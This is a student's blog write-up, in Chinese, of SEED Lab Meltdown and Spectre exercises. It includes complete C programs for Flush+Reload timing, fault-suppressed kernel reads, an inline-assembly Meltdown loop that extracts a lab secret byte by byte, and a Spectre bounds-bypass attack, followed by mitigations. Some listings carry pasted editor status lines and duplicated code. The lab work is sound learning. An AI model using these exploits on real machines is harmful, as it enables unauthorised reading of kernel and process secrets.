2022-04-07

software-security-lab2

大名鼎鼎的meltdown和specture，第一次学竟然还是在学校。
关于这两个实验的seedlab报告

meltdown

task1

当事先填充array[3]和array[7]的时候，可以看到访问速度明显加快了。

这些被提前加载到CPU cache中，导致访问时时间减少。

task2

第二部分使用side attack尝试恢复出访问较快的值。可以看到程序开头设置了一个threshold用来标识访问时间小于多少的时候算是访问了已经cache的数组。

关键代码如下。这里我们遍历数组，并获得访问每个数组之间的cpu line数目

void reloadSideChannel() 
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
     addr = &array[i*4096 + DELTA];
     time1 = __rdtscp(&junk);
     junk = *addr;
     time2 = __rdtscp(&junk) - time1;
     if (time2 <= CACHE_HIT_THRESHOLD){
         printf("array[%d*4096 + %d] is in cache.\n",i,DELTA);
         printf("The Secret = %d.\n",i);
     }
  }	
}

从之前可以看到存在着一些访问时间会小于这里初始设置的threshold小于80。于是我们就获得了结果。

但是注意可能要多尝试几次才能成功。

task3

这里作者实现了一个内核模块。这个内核模块首先打印出secret_data地址，接着用户可以通过这个模块定义的一个module和他交互，使得这个模块把一个secret_data读入内存。我们要做的就是把这个secret data读出。

那么task3的目的就是获得这句输出。

task4

task4想让我们做到直接尝试访问内核中的数据。如果不通过meltdown显然是不行的。下面是一个简单的测试。如果我们想通过printf告知我们已经读成功了，那么需要经过很长一系列库函数调用。在这段时间内CPU早就发现了我们已经越界访问，所以不可能成功读出数据。

设计的源代码如下，和文档中给出的一样。

#include<stdio.h>
int main()
{
char *kernel_data_addr = (char*)0xf90a3000;
char kernel_data = *kernel_data_addr;
printf("I have reached here.\n");
return 0;
}

task5

由于C没有原生的try…catch函数，我们需要使用sigjmp完成跳转。

#include <stdio.h>
#include <setjmp.h>
#include <signal.h>

static sigjmp_buf jbuf;
static void catch_segv()
{
  // Roll back to the checkpoint set by sigsetjmp().
  siglongjmp(jbuf, 1);                         
}
int main()
{ 
  // The address of our secret data
  unsigned long kernel_data_addr = 0xfb61b000;
  // Register a signal handler
  signal(SIGSEGV, catch_segv);                     
  if (sigsetjmp(jbuf, 1) == 0) {                
     // A SIGSEGV signal will be raised. 
     char kernel_data = *(char*)kernel_data_addr; 
     // The following statement will not be executed.
     printf("Kernel data at address %lu is: %c\n", 
                    kernel_data_addr, kernel_data);
  }
  else {
     printf("Memory access violation!\n");
  }
  printf("Program continues to execute.\n");
  return 0;
}

下面借助lab对上面代码理解。

在main第二行我们创建了一个segmentation fault的handler。这个handler设置段错误的处理函数为我们自定义的catch_segv。
接着看catch_segv。这是一个长跳转，让我们直接跳转到第17行保存的sigsetjump位置。同时当17行设置buf的时候，这个函数返回0，这导致我们通过17行的if判断。
在这个判断里面我们尝试访问内核数据。这将导致一个段错误，于是被handler捕获。
捕获之后我们调用handler中自己设计的siglongjmp(jbuf, 1);跳转到17行，同时返回1.
返回的1让17行判断不通过，进入else部分。输出一段话：发生了越界访问。

运行程序，发现我们在段错误之后依然可以执行。

task6

task6介绍了CPU乱序执行。用以下代码举例。

这其实在上课也讲过了，就是我们读取虽然会报错，但是CPU乱序执行下，第三条和第四条的汇编指令其实上是被读取到CPU_cache中的。

在这个lab中我们用下面的代码观察乱序执行。

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <fcntl.h>
#include <emmintrin.h>
#include <x86intrin.h>

/*********************** Flush + Reload ************************/
uint8_t array[256*4096];
/* cache hit time threshold assumed*/
#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

void flushSideChannel()
{
  int i;

  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;

  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}

void reloadSideChannel() 
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
     addr = &array[i*4096 + DELTA];
     time1 = __rdtscp(&junk);
     junk = *addr;
     time2 = __rdtscp(&junk) - time1;
     if (time2 <= CACHE_HIT_THRESHOLD){
         printf("array[%d*4096 + %d] is in cache.\n",i,DELTA);
         printf("The Secret = %d.\n",i);
     }
  }	
}
/*********************** Flush + Reload ************************/

void meltdown(unsigned long kernel_data_addr)
{
  char kernel_data = 0;
   
  // The following statement will cause an exception
  kernel_data = *(char*)kernel_data_addr;     
  array[7 * 4096 + DELTA] += 1;          
}

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;
   
   // Give eax register something to do
   asm volatile(
       ".rept 400;"                
       "add $0x141, %%eax;"
       ".endr;"                    
    
       :
       :
       : "eax"
   ); 
    
   // The following statement will cause an exception
   kernel_data = *(char*)kernel_data_addr;  
   array[kernel_data * 4096 + DELTA] += 1;           
}

// signal handler
static sigjmp_buf jbuf;
static void catch_segv()
{
  siglongjmp(jbuf, 1);
}

int main()
{
  // Register a signal handler
  signal(SIGSEGV, catch_segv);

  // FLUSH the probing array
  flushSideChannel();
    
  if (sigsetjmp(jbuf, 1) == 0) {
     meltdown(0xfb61b000);                
  }
  else {
      printf("Memory access violation!\n");
  }

  // RELOAD the probing array
  reloadSideChannel();                     
  return 0;
}

代码第53行其实就是模拟了把第七个数组元素加载到cache中。所以按理来说我们就应该输出secret=7。本质上这里并没有涉及meltdown获取内核信息。一下需要多尝试几次就能成功了。

task7.1

首先尝试修改task6的代码到能够读取内核数据。这也很简单，因为之前是写死的第七个cache。这里只要改成array[kernel_data * 4096 + DELTA ]即可。但是我经过很多次尝试，即使修改了threshold到200也没有成功。

关于修改delta以及这里写4096的原因是：OS里面的一个页面大小是4K,选择DELTA的原因是为了防止0那里有部分数据结构重复。

同时这里经常返回0的原因是，如果当操作系统检查出来权限不对时，往往会先返回0。可能和spectre的sandbox检查类似。

task7.2

尝试了直接在代码的main函数部分加上打开文件部分。提前把kern地址加载进来到CPU_cache里面。这样我们执行后面的加法语句就会快很多。

但是尽管尝试了修改上界，但是还是不行，不能提前于检查权限获取相应数据。

task7.3 asm problem

这次直接尝试用汇编触发meltdown。代码如下。尝试解释一下。这里CPU执行的时候会暂停到内联汇编这里(因为很耗时，不停循环做加法，并且由于只能对这一个寄存器操作，所以不能并行)由于乱序执行，CPU会执行到一定数量的add eax后，先执行下面读取kerneldata的部分，获取数据。然而此时ALU单元正在被占用。可以延长检查kernel页表权限的时间。

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;

   // Give eax register something to do
   asm volatile(
       ".rept 400;"
       "add $0x141, %%eax;"
       ".endr;"

       :
       :
       : "eax"
   );

   // The following statement will cause an exception
   kernel_data = *(char*)kernel_data_addr;
   array[kernel_data * 4096 + DELTA] += 1;
}

经过长时间的尝试，终于成功了。结果如下图。

可以看到读出了第一个secret是83。也就是’S’的ascii表示。

为了读出上述数据，需要融合7.2中的代码，也就是事先利用文件操作读取内核中的相关数据加载到内存中，之后利用meltdown攻击。如下图

但是可以看出成功概率依然很低。

尝试增加或者减少循环的次数，看会不会有帮助。我尝试了把循环从400改成4000或者40000，4000的时候有过几次成功，但是发现当改成40000的时候几乎不能成功。但是打开发现编译器似乎没有做优化。这里还不太清楚原因是什么。

总结一下上面所做的优化。

提前读取secret字符串到cpu_cache。利用之前写的内核模块。
使用汇编代码+汇编代码内部循环占用ALU，减慢权限检查速度。如想从原理的角度解释汇编循环的意义：重复的汇编占据了ALU，并且只作用在一个寄存器上，不能并行执行。然而当想要访问内核地址时，OS会在译码(不确定)位置提前准备好内存给CPU。然而后面的权限检查需要ALU的参与(回想一下自己写的操作系统，也是先找到了那个内存所在位置，再检查那个页面的权限是否正确的，因此无论如何都会提前load出来)

task8

经过简单修改上述代码，就能够成功的一次性获取所有kernel里面的内容了。可以看到我们获取的内容是正确的。

代码如下

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <fcntl.h>
#include <emmintrin.h>
#include <x86intrin.h>

/*********************** Flush + Reload ************************/
uint8_t array[256*4096];
/* cache hit time threshold assumed*/
#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

void flushSideChannel()
{
  int i;

  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;

  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}
// 这里注意修改score为非静态，否则无法重置其内容。
 int scores[256];

void reloadSideChannelImproved()
{
  int i;
  volatile uint8_t *addr;
  register uint64_t time1, time2;
  int junk = 0;
  for (i = 0; i < 256; i++) {
     addr = &array[i * 4096 + DELTA];
     time1 = __rdtscp(&junk);
     junk = *addr;
     time2 = __rdtscp(&junk) - time1;
     if (time2 <= CACHE_HIT_THRESHOLD)
        scores[i]++; /* if cache hit, add 1 for this value */
  }
}
/*********************** Flush + Reload ************************/

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;
   
   // Give eax register something to do
   asm volatile(
       ".rept 400;"                
       "add $0x141, %%eax;"
       ".endr;"                    
    
       :
       :
       : "eax"
   ); 
    
   // The following statement will cause an exception
   kernel_data = *(char*)kernel_data_addr;  
   array[kernel_data * 4096 + DELTA] += 1;              
}

// signal handler
static sigjmp_buf jbuf;
static void catch_segv()
{
   siglongjmp(jbuf, 1);
}

int main()
{
  int i, j, ret = 0;
  
  // Register signal handler
  signal(SIGSEGV, catch_segv);

  int fd = open("/proc/secret_data", O_RDONLY);
  if (fd < 0) {
    perror("open");
    return -1;
  }
  
  memset(scores, 0, sizeof(scores));
  flushSideChannel();
 int index=0; 
 // 加上有关index的循环，一次性爆破所有位置
for(;index<8;index++){	  
  // Retry 1000 times on the same address.
  for (i = 0; i < 1000; i++) {
	ret = pread(fd, NULL, 0, 0);
	if (ret < 0) {
	  perror("pread");
	  break;
	}
	
	// Flush the probing array
	for (j = 0; j < 256; j++) 
		_mm_clflush(&array[j * 4096 + DELTA]);

	if (sigsetjmp(jbuf, 1) == 0) { meltdown_asm(0xf90a3000+index); }

	reloadSideChannelImproved();
  }

  // Find the index with the highest score.
  int max = 0;
  for (i = 0; i < 256; i++) {
	if (scores[max] < scores[i]) max = i;
  }

  printf("The secret value for %d is %d %c\n",index, max, max);
  printf("The number of hits is %d\n", scores[max]);
  for(i=0;i<256;i++){
scores[i] = 0;
}
}
  return 0;
}

spectre

task3

3.1首先介绍了乱序执行的原理。CPU会记录下之前执行过的指令挑选的分支。因此我们需要先”训练CPU”一直挑选我们制定的分支开始乱序执行。

void victim(size_t x) { // 下面的参数size=10
if (x < size) { temp = array[x * 4096 + DELTA]; } }

for (i = 0; i < 10; i++) { 
    victim(i);  // i<10，因此可以在victim里面一直通过判断
}

接下来如果我们尝试

1	victim(97);

经过训练的CPU依然会执行这条指令，选择true的分支跳转。

注释flush_size

如果把flush_size注释掉，成功概率就变得很低了

这是因为把如果不flush size，那么下一次在victim判断的时候size已经在本地的TLB或者CPU cache甚至寄存器中，访问并比较size和x的时间将会变得很少。这样的事件还来不及执行乱序执行来加载出我们的数组到内存。

replace with (i+20)

可以看到成功概率也大大下降了。这是因为我们相当于训练了CPU每次都是false的结果。让CPU不会经过这样的分支选择。

task4

这里我们尝试真正使用specture去模拟攻击一个类似现实中沙箱的情景。原理如上。可以看到能够攻击成功。

然而并不是每次都能成功(这也很正常)因为我们也无法预测CPU的noise什么时候产生。

task5

problem1

可以看出确实每次成功的不一定是正确的，相反第一个元素的加载时间比较短。

发生这种情况的原因是，毕竟大部分情况下meltdown攻击可能不成功，这种情况下restricted返回值位0，因此我们就把array[0]加载到了内存。这种情况实际上是失败情况。因此我们要排除。

经过简单的修改(去除0号元素)可以得到下面的结果。发现确实是正确的。

problem2

这里我也不清楚。按照老师和同学们的讨论，应该和usleep时一个意思，拖延时间用的。

problem3 USLEEP

usleep终止了用户线程，但是OS对于内存的load并没有停止。这里加上可以让内存被load出来更有可能。同时查阅资料，一次传统的磁盘访问(随机访问)大约需要几十万时钟周期，15毫秒(ms)左右。一次usleep(10)是休息10微秒(μs),而一个ms是1000μs。所以考虑到磁盘读写，可能需要较大的usleep参数，比如15000(这是平均访问时间)，能够尽可能多的执行内存调出的命令。

经过尝试，当我们适当调高usleep的秒数时，成功率会提高。注意到下面的number of hits确实提高了。

task6

在main中加了一个简单的遍历循环。可以很方便的的到最后的结果。如下图所示。我最终把目标字符串直接打印了出来。

#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>


unsigned int bound_lower = 0;
unsigned int bound_upper = 9;
uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9};
uint8_t temp    = 0;
char    *secret = "Seed_Lab";
uint8_t array[256*4096];

#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

// Sandbox Function
uint8_t restrictedAccess(size_t x)
{
  if (x <= bound_upper && x >= bound_lower) {
     return buffer[x];
  } else {
     return 0;
  }
}

void flushSideChannel()
{
  int i;
  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;
  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}

static int scores[256];
void reloadSideChannelImproved()
                                                                                                                                          32,3          Top static int scores[256];
void reloadSideChannelImproved()
{
int i;
  volatile uint8_t *addr;
  register uint64_t time1, time2;
  int junk = 0;
  for (i = 1; i < 256; i++) {
    addr = &array[i * 4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD)
      scores[i]++; /* if cache hit, add 1 for this value */
  }
}

void spectreAttack(size_t index_beyond)
{
  int i;
  uint8_t s;
  volatile int z;

  for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }

  // Train the CPU to take the true branch inside victim().
  for (i = 0; i < 10; i++) {
    restrictedAccess(i);
  }

  // Flush bound_upper, bound_lower, and array[] from the cache.
  _mm_clflush(&bound_upper);
  _mm_clflush(&bound_lower);
  for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }
  for (z = 0; z < 100; z++)  {  }
  //
  // Ask victim() to return the secret in out-of-order execution.
  s = restrictedAccess(index_beyond);
  array[s*4096 + DELTA] += 88;
                                                                                                                                          38,1          55%   s = restrictedAccess(index_beyond);
  array[s*4096 + DELTA] += 88;
}

int main() {
  int i;
int cnt = 0;
uint8_t s;
for(cnt=0;cnt<8;cnt++){
  size_t index_beyond = (size_t)(&secret[cnt] - (char*)buffer);

  flushSideChannel();
  for(i=0;i<256; i++) scores[i]=0;

  for (i = 0; i < 1000; i++) {
    //printf("*****\n");  // This seemly "useless" line is necessary for the attack to succeed
    spectreAttack(index_beyond);
    usleep(10);
    reloadSideChannelImproved();
  }

  int max = 0;
  for (i = 0; i < 256; i++){
    if(scores[max] < scores[i]) max = i;
  }

  printf("Reading secret value at index %ld\n", index_beyond);
  printf("The secret value[%d] is %d(%c)\n",cnt, max, max);
  printf("The number of hits is %d\n", scores[max]);
}
return (0);
}

总结

总结一下两个实验的异同

角度	meltdown	spectre
产生原因	CPU乱序执行，在权限检查时首先会把对应地址以及加载到CPU_CACHE中之后再检查权限。在检查权限之后没有清除CPU_buffer，导致可以测信道攻击。	CPU在分支预测时发生乱序执行。提前加载了判断语句后面的内容。
触发条件	访问不可读的内核部分数据	在进程内，访问不可读的沙箱中的数据
优化方法(增大成功率)	1.使用汇编代码占用ALU 2.提前将数据读取CPU_cache 3.统计方法	1.把参与比较的内容提前从buffer里面flush，加大比较时间。 2.训练CPU在每次分支预测时选择我们期望的path，达到一种类似欺骗的效果。 3.统计方法
攻击效果	访问不可读数据	(同)
修复方案	1. 采用lfence，使得在完成某一条指令之前，不可进行乱序执行 2.完全禁止乱序执行(开销较大)或者在部分地方告诉CPU只能串行执行 3.降低CPU提供的时钟接口返回值的准确性(只需要在高精度下模糊就可以)从而难以进行测信道攻击。	(同)

这次的两个非常著名的漏洞，教会了我一些硬件方面的漏洞挖掘方法，以及测信道攻击思路。受益良多。

本文标题:software-security-lab2

文章作者:

发布时间:2022-04-07, 16:38:21

最后更新:2022-04-25, 17:17:26

原始链接:https://nicholas-wei.github.io/2022/04/07/software-security-lab2/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。